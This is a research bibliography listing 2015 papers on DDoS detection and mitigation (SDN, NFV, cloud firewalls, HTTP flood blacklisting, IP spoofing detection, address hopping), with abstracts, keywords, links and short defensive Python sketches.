Keywords: computer network security; software defined networking; telecommunication traffic; SDN-enabled networks; attack types; attacker adaptation; defender constraints; defense mechanism; distributed denial-of-service attack mitigation; elastic capacity invocation; external blacklist information; filtering; flooding DDoS mitigation; load control; normal traffic learning; overwhelming attack; performance analysis; physical SDN testbed; real-life normal traffic traces; service elasticity; service levels; software defined networking; synthetic attack traces; traffic management; Cloud computing; Clustering algorithms; Computer crime; Control systems; IP networks; Servers (ID#: 16-9074)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335317&isnumber=7335267

 

Hirayama, Takayuki; Toyoda, Kentaroh; Sasase, Iwao, "Fast Target Link Flooding Attack Detection Scheme by Analyzing Traceroute Packets Flow," in Information Forensics and Security (WIFS), 2015 IEEE International Workshop on, pp. 1-6, 16-19 Nov. 2015. doi: 10.1109/WIFS.2015.7368594

Abstract: Recently, a botnet-based DDoS (Distributed Denial of Service) attack, called the target link flooding attack, has been reported; it cuts off specific links over the Internet and disconnects a specific region from other regions. Detecting or mitigating a target link flooding attack is more difficult than with legacy DDoS attack techniques, since the attacking flows do not reach the target region. Although many mitigation schemes have been proposed, they detect the attack only after it occurs. In this paper, we propose a fast target link flooding attack detection scheme that leverages the fact that traceroute packets increase before the attack, owing to the attacker's reconnaissance. Moreover, by analyzing the characteristic of the target link flooding attack that the number of traceroute packets increases simultaneously in various regions of the network, we propose a detection scheme with multiple detection servers to eliminate the false alarms caused by sudden increases of traceroute packets sent by legitimate users. We show the effectiveness of our scheme through computer simulations.

Keywords: Computational modeling; Reconnaissance (ID#: 16-9075)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7368594&isnumber=7368550
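
The multi-server false-alarm filter can be illustrated in a few lines: alarm only when traceroute counts surge in several regions at once. The baseline, surge factor, and region names below are invented:

BASELINE = 20       # typical traceroutes per interval per region (assumed)
SURGE_FACTOR = 5    # how far above baseline counts as a surge
MIN_REGIONS = 3     # alarm only when several regions surge together

def detect(reports):
    """`reports` maps detection-server region -> traceroute count this interval.
    A single-region spike is treated as noise (a legitimate user debugging);
    a simultaneous multi-region spike suggests pre-attack reconnaissance."""
    surging = [r for r, count in reports.items() if count > BASELINE * SURGE_FACTOR]
    return len(surging) >= MIN_REGIONS, surging

alarm, where = detect({"eu-west": 400, "us-east": 350, "ap-south": 280, "sa-east": 15})
print(alarm, where)   # True: possible reconnaissance for a target link flooding attack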

 

Jog, M.; Natu, M.; Shelke, S., "Distributed Capabilities-based DDoS Defense," in Pervasive Computing (ICPC), 2015 International Conference on, pp. 1-6, 8-10 Jan. 2015. doi: 10.1109/PERVASIVE.2015.7086993

Abstract: Existing strategies against DDoS are implemented as single-point solutions at different network locations. Our understanding is that no single network location can cater to the needs of a foolproof defense solution, given the nature of DDoS and the activities needed for its mitigation. This paper gives collective information about some important defense mechanisms, discussing their advantages and limitations. Based on our understanding, we propose a distribution of DDoS defense which uses improved techniques for capabilities-based traffic differentiation and scheduling-based rate-limiting. Additionally, we propose a novel approach for attack prediction to determine the prospective attackers as well as the time-to-saturation of the victim. We present two algorithms for this distribution of defense. The proposed distributed approach, built with these incremental improvements in the defense activities, is expected to provide a better solution to the DDoS problem.

Keywords: computer network security; DDoS defense; capabilities-based traffic differentiation; distributed denial-of-service; incremental improvements; scheduling-based rate-limiting; single-point solutions; Aggregates; Bandwidth; Computer crime; Filtering; Floods; IP networks; Limiting; Attack detection; Distributed Denial-of-Service; Distributed defense; Network security; Rate-limiting; Traffic differentiation (ID#: 16-9076)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7086993&isnumber=7086957

 

Guenane, F.; Nogueira, M.; Serhrouchni, A., "DDOS Mitigation Cloud-Based Service," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 1363-1368, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.531

Abstract: Cloud computing has evolved over the last decade from a simple storage service to more complex ones, offering software as a service (SaaS), platforms as a service (PaaS) and, most recently, security as a service (SECaaS). The work presented in this paper is a response to: (1) the resource constraints in physical security devices such as firewalls or IPS/IDS, which can no longer counter advanced DDoS attacks, and (2) the expensive cost, management complexity and high resource requirements of existing DDoS mitigation tools for verifying traffic. We propose a new architecture for a cloud-based firewalling service using resources offered by the Cloud and characterized by low financial cost, high availability, reliability, self-scaling and easy management. In order to improve the efficiency of our proposal in facing DDoS attacks, we deploy, configure and test our mitigation service using Network Function Virtualization (NFV) technology and other virtualization capabilities. We also detail some results and point out future work.

Keywords: cloud computing; firewalls; reliability; virtualisation; DDOS mitigation tools; NFV; availability; cloud based firewalling service; cloud computing; cloud-based service; distributed denial of service; financial cost; management complexity; network function virtualization technology; physical security devices resource constraints; reliability; self scaling; traffic verification; Authentication; Cloud computing; Computer architecture; Computer crime; Firewalls (computing); Logic gates; Cloud based service; DDOS; Distributed Denial of Service; Firewalling; SECAAS; Security As A Service (ID#: 16-9077)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345439&isnumber=7345233

 

Alosaimi, Wael; Zak, Michal; Al-Begain, Khalid, "Denial of Service Attacks Mitigation in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 47-53, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.48

Abstract: Denial of Service (DoS) attacks form a permanent risk to traditional networks and the cloud environment, and such malicious attacks can be amplified into Distributed Denial of Service (DDoS) attacks. Moreover, the cloud payment model can be affected by attacks that exploit cloud scalability; in this case, the attack is called an Economical Denial of Sustainability (EDoS) attack. This study introduces an effective solution designed to counteract such attacks and protect targeted networks. The proposed framework is called the Enhanced DDoS-Mitigation System (Enhanced DDoS-MS). The method is tested practically, and the test results proved the success of the framework in limiting the end-to-end response time and handling complex versions of these attacks on multiple layers.

Keywords: CAPTCHAs; Cloud computing Computer crime; Firewalls (computing); IP networks; Limiting; Servers; Cloud Computing; DDoS; Denial of Service; Distributed Denial of Service attacks; DoS; EDoS; Economical Denial of Sustainability (ID#: 16-9078)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373217&isnumber=7373199

 

Fung, C.J.; McCormick, B., "VGuard: A Distributed Denial of Service Attack Mitigation Method Using Network Function Virtualization," in Network and Service Management (CNSM), 2015 11th International Conference on, pp. 64-70, 9-13 Nov. 2015. doi: 10.1109/CNSM.2015.7367340

Abstract: Distributed denial of service (DDoS) attacks have caused tremendous damage to ISPs and online services. They can be divided into attacks using spoofed IPs and attacks using real IPs (botnets). Among them, the attacks from real IPs are much harder to mitigate, since the attack traffic can be fabricated to resemble legitimate traffic. The corresponding DDoS defence strategies proposed in the past few years have not proven highly effective due to the limitations of the participating devices. However, the emergence of next-generation networking technologies such as network function virtualization (NFV) provides a new opportunity for researchers to design DDoS mitigation solutions. In this paper we propose VGuard, a dynamic traffic engineering solution based on prioritization, implemented on a DDoS virtual network function (VNF). Flows from the external zone are directed to different tunnels based on their priority levels. In this way, trusted legitimate flows are served with guaranteed quality of service, while attack flows and suspicious flows compete with each other for resources. We propose two methods for flow direction: a static method and a dynamic method. We evaluated the performance of both methods through simulation. Our results show that both methods can effectively provide satisfying service to trusted flows under DDoS attacks, and that each has its pros and cons under different situations.

Keywords: computer network security; telecommunication traffic; virtualisation; DDoS virtual network function; IP spoofing; VGuard; distributed denial of service attack mitigation; dynamic method; flow direction method; network function virtualization; prioritization based dynamic traffic engineering; real IP botnet; static method; Computer crime; Dispatching; Hardware; IP networks; Quality of service; Servers (ID#: 16-9079)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7367340&isnumber=7367318
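
The static dispatching method can be caricatured in a few lines: trusted flows go to the QoS-guaranteed tunnel, the rest to best effort. The trust scores and the 0.8 cut-off below are assumptions; the dynamic method would adjust assignments as conditions change:

def dispatch(flow_trust, tunnels=("guaranteed", "best_effort")):
    """Static VGuard-style dispatching: trusted flows get the QoS-guaranteed
    tunnel, everything else competes in the best-effort one."""
    return {flow: (tunnels[0] if trust >= 0.8 else tunnels[1])
            for flow, trust in flow_trust.items()}

print(dispatch({"10.1.1.1->80": 0.95, "203.0.113.5->80": 0.1, "10.2.2.2->80": 0.85}))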

 

Alosaimi, Wael; Alshamrani, Mazin; Al-Begain, Khalid, "Simulation-Based Study of Distributed Denial of Service Attacks Prevention in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 60-65, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.50

Abstract: Distributed Denial of Service (DDoS) attacks can affect the availability of networks. In the age of cloud computing, these attacks are becoming more harmful, both in their familiar effects and in new effects that harm cloud sustainability by exploiting its scalability and payment model (pay-as-you-use). A new form of DDoS attack has therefore been introduced in the cloud context as an economical version of such attacks, known as the Economical Denial of Sustainability (EDoS) attack. To counteract such attacks, traditional network security means are used. Specifically, firewalls, which filter the packets incoming to the targeted network according to rules designated by administrators, can mitigate the impacts of DDoS and EDoS attacks. In this paper, a new solution called the Enhanced DDoS-Mitigation System (Enhanced DDoS-MS) is proposed to counter these attacks by utilizing firewall capabilities to control a verification process that protects the targeted system. These capabilities are evaluated in a simulation environment. The results proved that the firewall successfully mitigates the DDoS impacts, improving the services provided to users in terms of response time and server load under attack. The study also suggests a follow-on implementation of the proposed framework with an active testbed.

Keywords: Cloud computing; Computer crime; Floods; IP networks; Protocols; Servers; DDoS; Distributed Denial of Service attacks; EDoS; Economical Denial of Sustainability; cloud computing (ID#: 16-9080)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373219&isnumber=7373199

 

Jinyong Kim; Daghmehchi Firoozjaei, M.; Jeong, J.P.; Hyoungshick Kim; Jung-Soo Park, "SDN-Based Security Services Using Interface To Network Security Functions," in Information and Communication Technology Convergence (ICTC), 2015 International Conference on, pp. 526-529, 28-30 Oct. 2015. doi: 10.1109/ICTC.2015.7354602

Abstract: This paper proposes a framework for security services using Software-Defined Networking (SDN) and the Interface to Network Security Functions (I2NSF). It specifies requirements for such a framework for security services based on network virtualization, and describes two representative security systems: (i) a centralized firewall system and (ii) a DDoS-attack mitigation system. For each service, this paper discusses the limitations of existing systems and presents a possible SDN-based system to protect network resources by controlling suspicious and dangerous network traffic.

Keywords: firewalls; software defined networking; telecommunication security; I2NSF; DDoS-attack mitigation system; SDN-based security services; SDN-based system; centralized firewall system; interface-to-network security functions; network resources; network security functions; network traffic; software-defined networking; Access control; Communication networks; Computer crime; Control systems; Firewalls (computing); Servers (ID#: 16-9081)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7354602&isnumber=7354472

 

Tang, C.; Lee, E.; Tang, A.; Lixin Tao, "Mitigating HTTP Flooding Attacks with Meta-data Analysis," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1406-1411, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.203

Abstract: The rise of Distributed Denial of Service (DDoS) attacks has posed a dire threat to cloud computing services in recent years. First, it is getting increasingly difficult to discriminate legitimate traffic from malicious traffic, since both are legal at the application-protocol level. Second, DDoS attacks have tremendous impacts on virtual machine performance due to the over-subscribed sharing nature of a cloud data center. To prevent the most serious HTTP GET flooding attacks, we propose a meta-data based monitoring approach, in which the behavior of malicious HTTP requests is captured through real-time big-data analysis. The proposed DDoS defense system can provide continued service to legitimate clients even when the attacking line-rate is as high as 9 Gbps. An intelligent probe is first used to extract the meta-data about an HTTP connection, which can be thought of as an (IP, URL) pair (URL: Uniform Resource Locator). Then, a real-time big-data analysis technique is applied on top of the meta-data to identify the IP addresses whose HTTP request frequency significantly surpasses the norm. The blacklist, consisting of these IP addresses, is then aggregated, enabling inline devices (firewalls and load balancers) to apply rate-limiting rules to mitigate the attacks. Our findings show that the performance of the meta-data based detection system is one order of magnitude better than the previous approach.

Keywords: Big Data; cloud computing; computer centres; data analysis; firewalls; meta data; telecommunication traffic; transport protocols; virtual machines; Big-Data analysis; DDoS attack; DDoS defense system; HTTP GET flooding attack mitigation; HTTP connection; HTTP request frequency; IP address; application-protocol level; cloud computing services; cloud data center; distributed denial of service attack; firewall; inline devices; intelligent probe; legitimate traffic; load balancer; malicious HTTP request; malicious traffic; meta-data analysis; meta-data based detection system; meta-data based monitoring approach; rate-limiting rule; virtual machine performance; Computer crime; Floods; IP networks; Protocols; Real-time systems; Servers; Uniform resource locators; DDoS; HTTP GET flooding; meta-data analysis; network protocol parser (ID#: 16-9082)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336365&isnumber=7336120
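
As an illustrative reduction of the meta-data analysis (ignoring the real-time big-data machinery), the sketch below counts requests per source IP from (IP, URL) records and blacklists IPs whose frequency significantly surpasses the norm; the mean-plus-k-standard-deviations cutoff is an assumption:

import statistics
from collections import Counter

def build_blacklist(requests, k=3.0):
    """Flag source IPs whose request frequency exceeds mean + k standard
    deviations (k assumed). `requests` yields (src_ip, url) meta-data records."""
    per_ip = Counter(ip for ip, _url in requests)
    counts = list(per_ip.values())
    if len(counts) < 2:
        return set()
    cutoff = statistics.mean(counts) + k * statistics.stdev(counts)
    return {ip for ip, c in per_ip.items() if c > cutoff}

# Toy interval: many clients issue a handful of GETs, one bot hammers a URL.
recs = [(f"10.0.0.{i}", "/index") for i in range(50) for _ in range(3)]
recs += [("203.0.113.66", "/login")] * 500
print(build_blacklist(recs))   # -> {'203.0.113.66'}; feed to firewall rate-limits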

 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Distributed Denial of Service Attack Prevention 2015

 

 
SoS Logo

Distributed Denial of Service Attack Prevention 2015

 

Distributed Denial of Service Attacks continue to be among the most prolific forms of attack against information systems.  According to the NSFOCUS DDOS Report for 2014 (available at: http://en.nsfocus.com/2014/SecurityReport_0320/165.html), DDOS attacks occur at the rate of 28 per hour.  Research into methods of prevention is also substantial, as the articles presented here show.  This work was presented in 2015.


Akbar, Abdullah; Basha, S.Mahaboob; Sattar, Syed Abdul, "Leveraging the SIP Load Balancer to Detect and Mitigate DDoS Attacks," in Green Computing and Internet of Things (ICGCIoT), 2015 International Conference on, pp. 1204-1208, 8-10 Oct. 2015. doi: 10.1109/ICGCIoT.2015.7380646

Abstract: SIP-based Voice over IP (VoIP) networks are becoming predominant in current and future communications. Distributed Denial of Service attacks pose a serious threat to VoIP network security, and SIP servers are their victims. The major aim of DDoS attacks is to prevent legitimate users from accessing the resources of SIP servers. DDoS attacks target the VoIP network by deploying bots at different locations and injecting malformed packets, and can even halt the entire VoIP service, causing degradation of QoS (Quality of Service). DDoS attacks are easy to launch and quickly drain the computational resources of VoIP networks and nodes. Detecting DDoS attacks is challenging and extremely difficult due to the varying strategies and scope of attackers. Many DDoS detection and prevention schemes are deployed in VoIP networks, but none works completely in both real-time and offline modes: they are inefficient in detecting dynamic and low-rate DDoS attacks and even fail when the attack is launched by simultaneously manipulating multiple SIP attributes. In this paper we propose a novel scheme based on the Hellinger distance (HD) to detect low-rate and multi-attribute DDoS attacks. Usually, DDoS detection and mitigation schemes are implemented in the SIP proxy, but we leverage the SIP load balancer to fight DDoS by using its existing load-balancing features. We have implemented the proposed scheme by modifying the leading open-source Kamailio SIP proxy server. We have evaluated our scheme with an experimental test setup and found that the results outperform existing DDoS prevention schemes in terms of detection rate, system overhead and false-positive alarms.

Keywords: Computer crime; Feature extraction; Floods; Internet telephony; Multimedia communication; Protocols; Servers; Overload Control; Session Initiation Protocol (SIP); kamailio; server (ID#: 16-9050)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7380646&isnumber=7380415

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., "Web Server Protection against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication," in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, pp. 261-267, 1-5 July 2015. doi: 10.1109/COMPSAC.2015.240

Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks that have significant impact on destination servers and networks, due to their ability to be launched with minimal computational resources to cause an effect of high magnitude. Commercial and government Web servers have become the primary target of these kinds of attacks, with recent mitigation efforts struggling to contain the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal and legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous, as they may cause the IDS/IPS to block a user's benign traffic. Our focus and contributions in this paper are, first, to mitigate undetected malicious traffic mimicking legitimate traffic by developing a special anti-DDoS module for general and specific DDoS tool attacks, using a trained classifier in a random tree machine-learning algorithm. We use labeled datasets to generate rules to incorporate into and fine-tune existing IDS/IPS such as Snort. Secondly, we further assist the IDS/IPS by processing traffic that it classifies as malicious in order to identify FPs and route them to their intended destinations. To achieve this, our approach uses active authentication of the traffic source of both legitimate and malicious traffic, at the Bait and Decoy servers respectively, before it is forwarded to the Web server.

Keywords: Internet; computer network security; file servers; learning (artificial intelligence); pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers; intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9051)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299

 

Van Trung, Phan; Huong, Truong Thu; Van Tuyen, Dang; Duc, Duong Minh; Thanh, Nguyen Huu; Marshall, Alan, "A Multi-Criteria-Based DDoS-Attack Prevention Solution Using Software Defined Networking," in Advanced Technologies for Communications (ATC), 2015 International Conference on, pp. 308-313, 14-16 Oct. 2015. doi: 10.1109/ATC.2015.7388340

Abstract: Software-Defined Networking (SDN) has become a promising network architecture in which network devices are controlled by an SDN controller. Employing SDN offers an attractive solution for network security. However, attack prediction and prevention, especially for Distributed Denial of Service (DDoS) attacks, is a challenge in SDN environments. This paper analyzes the characteristics of traffic flows streaming up to a Vietnamese ISP server during both normal operation and DDoS attack traffic. Based on the traffic analysis, an SDN-based attack prevention architecture is proposed that is able to capture and analyze incoming flows on the fly. A multi-criteria prevention mechanism is then designed using both hard-decision thresholds and a fuzzy inference system to detect DDoS attacks. In response to determining the presence of attacks, the designed system is capable of dropping attack flows on demand from the control plane.

Keywords: Computer architecture; Computer crime; Fuzzy logic; IP networks; Servers; Switches; DDoS attack; Fuzzy Logic; OpenFlow/SDN (ID#: 16-9052)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7388340&isnumber=7388293
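
The combination of fuzzy inference with a hard decision threshold can be sketched as below; the membership shapes, breakpoints, and rules are invented for illustration and are not the paper's tuned system:

def tri(x, a, b, c):
    """Triangular membership function over [a, c] with peak at b."""
    if x <= a or x >= c:
        return 0.0
    return (x - a) / (b - a) if x <= b else (c - x) / (c - b)

def attack_degree(pkt_rate, src_entropy):
    """Two illustrative rules (shapes and breakpoints are assumptions):
       R1: IF rate is high AND source entropy is high THEN attack
       R2: IF rate is high AND source entropy is low  THEN flash crowd / normal
    Returns the firing strength of the 'attack' rule in [0, 1]."""
    rate_high = tri(pkt_rate, 5_000, 20_000, 1e9)
    entropy_high = tri(src_entropy, 0.5, 0.9, 1.01)
    return min(rate_high, entropy_high)       # fuzzy AND = min (Mamdani)

score = attack_degree(pkt_rate=18_000, src_entropy=0.95)
if score > 0.5:                               # hard-decision threshold on top
    print("drop flows at the controller, degree", round(score, 2))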

 

Osanaiye, O.A., "Short Paper: IP Spoofing Detection for Preventing DDoS Attack in Cloud Computing," in Intelligence in Next Generation Networks (ICIN), 2015 18th International Conference on, pp. 139-141, 17-19 Feb. 2015. doi: 10.1109/ICIN.2015.7073820

Abstract: The Distributed Denial of Service (DDoS) attack has been identified as the biggest security threat to service availability in Cloud Computing. It prevents legitimate Cloud users from accessing the pool of resources provided by Cloud providers by flooding and consuming network bandwidth to exhaust servers and computing resources. A major attribute of a DDoS attack is the spoofing of the IP address, which hides the identity of the attacker. This paper discusses different methods for detecting spoofed IP packets in Cloud Computing and proposes host-based Operating System (OS) fingerprinting, which uses both passive and active methods to match the operating system of an incoming packet against its database. Additionally, we demonstrate how the proposed technique can be implemented in a Cloud Computing environment.

Keywords: IP networks; cloud computing; computer network security; operating systems (computers); resource allocation; DDoS attack prevention; IP spoofing detection; active method; cloud computing; cloud providers; cloud users; computing resources; distributed denial of service attack; host-based OS fingerprinting; host-based operating system fingerprinting; network bandwidth flooding; passive method; security threat; service availability; spoofed IP packet detection; Cloud computing; Computer crime; Databases; Fingerprint recognition; IP networks; Probes; Cloud Computing; DDoS attack; IP Spoofing; OS Fingerprinting (ID#: 16-9053)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073820&isnumber=7073795
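
Passive OS fingerprinting for spoofing detection boils down to comparing observable header fields against the values expected for the host's known OS. The toy table and two-field check below are illustrative only; real fingerprint databases, such as p0f's, are far richer:

# Toy passive-fingerprint table: (initial TTL, TCP window size) per OS.
FINGERPRINTS = {
    "linux": (64, 5840),
    "windows": (128, 65535),
    "freebsd": (64, 65535),
}

def guess_initial_ttl(observed_ttl):
    """Round the observed TTL up to the nearest common initial value."""
    for initial in (64, 128, 255):
        if observed_ttl <= initial:
            return initial
    return 255

def looks_spoofed(observed_ttl, window, claimed_os):
    ttl0, win0 = FINGERPRINTS[claimed_os]
    return guess_initial_ttl(observed_ttl) != ttl0 or window != win0

# A packet claiming to come from a known Linux host but carrying a
# Windows-like fingerprint is a spoofing suspect.
print(looks_spoofed(observed_ttl=117, window=65535, claimed_os="linux"))   # True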

 

Mizukoshi, M.; Munetomo, M., "Distributed Denial of Services Attack Protection System With Genetic Algorithms on Hadoop Cluster Computing Framework," in Evolutionary Computation (CEC), 2015 IEEE Congress on, pp. 1575-1580, 25-28 May 2015. doi: 10.1109/CEC.2015.7257075

Abstract: DDoS attacks have become one of the most serious menaces to Internet security. They are difficult to prevent because DDoS attackers send spoofed packets to the victim, which makes identifying the origin of the attack very difficult. A series of techniques have been studied, such as pattern matching by learning the attack pattern, and abnormal traffic detection. However, the pattern matching approach is not reliable, because attackers always launch attacks with different traffic patterns while the pattern matching approach only learns from past DDoS data. Therefore, a reliable system has to watch what kinds of attacks are being carried out now and investigate how to prevent those attacks. Moreover, the amount of traffic flowing through the Internet is increasing rapidly, so packet analysis must be done within a reasonable amount of time. This paper proposes a scalable, real-time traffic pattern analysis based on a genetic algorithm to detect and prevent DDoS attacks on the Hadoop distributed processing infrastructure. Experimental results demonstrate the effectiveness of our scalable DDoS protection system.

Keywords: computer network security; data handling; genetic algorithms; parallel processing; telecommunication traffic; DDoS attack prevention; Hadoop cluster computing framework; Hadoop distributed processing infrastructure; Internet security; distributed denial-of-service attack protection system; genetic algorithms; scalable DDoS protection system; spoofing packets; traffic pattern analysis; Accuracy; Computer crime; Distributed processing; Genetic algorithms; Genetics; IP networks; Sparks; DDoS attack; Genetic Algorithm; Hadoop (ID#: 16-9054)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7257075&isnumber=7256859
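
Stripped of the Hadoop distribution, the genetic-algorithm core is easy to sketch: evolve a candidate detection threshold against labelled flows, where each fitness evaluation is the work Hadoop would parallelize. All data and GA parameters below are synthetic:

import random

def fitness(threshold, flows):
    """Score a candidate packets-per-second threshold on labelled flows:
    +1 per correctly classified flow (labels and data are synthetic)."""
    return sum((rate > threshold) == is_attack for rate, is_attack in flows)

def evolve(flows, pop_size=20, generations=30):
    pop = [random.uniform(0, 1000) for _ in range(pop_size)]
    for _ in range(generations):
        pop.sort(key=lambda t: fitness(t, flows), reverse=True)
        parents = pop[: pop_size // 2]                               # selection
        children = [(random.choice(parents) + random.choice(parents)) / 2  # crossover
                    + random.gauss(0, 10)                                   # mutation
                    for _ in range(pop_size - len(parents))]
        pop = parents + children
    return max(pop, key=lambda t: fitness(t, flows))

flows = [(random.uniform(0, 100), False) for _ in range(200)] \
      + [(random.uniform(400, 900), True) for _ in range(50)]
print(round(evolve(flows)))   # lands somewhere between the two rate bands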

 

Nagpal, B.; Sharma, P.; Chauhan, N.; Panesar, A., "DDoS Tools: Classification, Analysis and Comparison," in Computing for Sustainable Global Development (INDIACom), 2015 2nd International Conference on, pp. 342-346, 11-13 March 2015. doi: (not provided)

Abstract: Distributed Denial of Service (DDoS) attacks are a major concern for security experts. A DDoS attack presents a serious risk to the internet. In this type of attack, a huge number of compromised hosts send requests to the victim's site simultaneously, to exhaust its resources (whether computing or communication resources) within a very short time. In the last few years, it has been recognised that DDoS attack tools and techniques are becoming effective, refined, and complex, making it hard to identify the actual attackers. Due to the seriousness of the problem, many detection and prevention methods have been recommended to deal with these types of attacks. This paper aims to provide a better understanding of the existing tools, methods and attack mechanisms. We present a detailed study of various DDoS tools, which can be useful to researchers and readers seeking a better understanding of the DDoS tools in use today.

Keywords: computer network security; DDoS attack tools; classification; distributed denial of service attacks; Bandwidth; Computer architecture; Computer crime; Encryption; Floods; IP networks; Internet; DDoS; DDoS attack methods; DDoS attack tools; DDoS defences (ID#: 16-9055)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7100270&isnumber=7100186

 

Ali, W.; Jun Sang; Naeem, H.; Naeem, R.; Raza, A., "Wireshark Window Authentication Based Packet Capturing Scheme to Prevent DDoS Related Security Issues in Cloud Network Nodes," in Software Engineering and Service Science (ICSESS), 2015 6th IEEE International Conference on, pp. 114-118, 23-25 Sept. 2015. doi: 10.1109/ICSESS.2015.7339017

Abstract: A DoS (Denial of Service) attack forces a cloud network node to handle unauthorized accesses that consume unwanted computing cycles. As a result, the cloud node responds more slowly than usual, and resources on the cloud network become unavailable. Examples of DoS attacks include Ping of Death, Teardrop, Snork, locking authentication, SYN flooding, and operating system attacks. The most damaging incidents occur when an adversary commits a DDoS (Distributed Denial of Service) attack from a compromised cloud network. In this paper, prevention techniques for DDoS attacks in cloud nodes are discussed, and a dynamic window scheme for cloud nodes that performs message verification to avoid unnecessary packet processing is proposed.

Keywords: authorisation; cloud computing; computer network security; DDoS related security issues; Ping of Death; SYN flooding; Snork; Teardrop; Wireshark window authentication based packet capturing scheme; cloud network node response; distributed denial of service attack; dynamic window scheme; locking authentication; operating system attacks; unauthorized access; Computer crime; Computer science; Computers; Service computing; Software; Software engineering; Cloud Nodes; DDoS attack; DoS attack; cloud network; dynamic windows (ID#: 16-9056)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7339017&isnumber=7338993

 

Krylov, V.; Kravtsov, K., "The Convoluted Multiaddress Networking Architecture Principles and Application," in Future Generation Communication Technology (FGCT), 2015 Fourth International Conference on, pp. 1-6, 29-31 July 2015. doi: 10.1109/FGCT.2015.7300237

Abstract: To increase the robustness of network nodes and their communication sessions, we propose a convoluted multiaddress networking architecture. This approach prevents malicious packets from entering the incoming traffic of a network terminal. Usually, traffic analyzers and filtering solutions must be installed in the network to isolate a victim node from packet streams created by malefactor terminals. Our network security technique is built on a different approach. The principles of convoluted multiaddress networks are based on the idea that we can protect nodes by hiding their network location from illegitimate clients. In our study, we show how to create dynamic addressing policies for preventing DDoS attacks and traffic eavesdropping. These policies randomize the address space and communication data streams, so a malefactor cannot acquire access to data streams or destination terminals. In this paper, we discuss IP Fast Hopping, an application of convoluted multiaddress networking in TCP/IP networks. We consider a basic implementation of this architecture, its major practical constraints, and initial experimental results. The presented approach aims to ensure the security of future-generation communication technologies. We also suggest the Thing Lakes architecture for the Internet of Things, which is based on the IP Fast Hopping approach and is intended to protect the IoT environment against several major security issues in such networks.

Keywords: IP networks; Internet of Things; telecommunication security; transport protocols; DDoS attacks prevention; IP fast hopping; Internet of Things; IoT environment; TCP-IP networks; convoluted multiaddress networking architecture principles; malefactor terminals; network security technique; network terminal; packet streams; Computer crime; IP networks; Internet of things; Lakes; Logic gates; Servers; DDoS; IP Fast Hopping; Internet of Thing; network security; networking architecture (ID#: 16-9057)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7300237&isnumber=7300234
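
The address-hiding idea can be illustrated with a short sketch. The Python fragment below shows one plausible way a client and server could derive the current address from a shared secret and a time slot; the HMAC construction, address pool, and slot length are assumptions for illustration, not the paper's specification.

```python
# Conceptual address-hopping sketch in the spirit of IP Fast Hopping: the
# server's current address is a keyed function of the time slot, so only
# clients holding the shared secret can compute where to send packets.
import hmac, hashlib, time

SECRET = b"pre-shared session key"
ADDRESS_POOL = [f"203.0.113.{i}" for i in range(1, 255)]  # documentation range
SLOT_SECONDS = 5

def current_address(secret, now=None):
    slot = int((now or time.time()) // SLOT_SECONDS)
    digest = hmac.new(secret, str(slot).encode(), hashlib.sha256).digest()
    index = int.from_bytes(digest[:4], "big") % len(ADDRESS_POOL)
    return ADDRESS_POOL[index]

# Client and server independently agree on the same address for this slot;
# packets sent to any other address in the pool are dropped as illegitimate.
print(current_address(SECRET))
```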

 

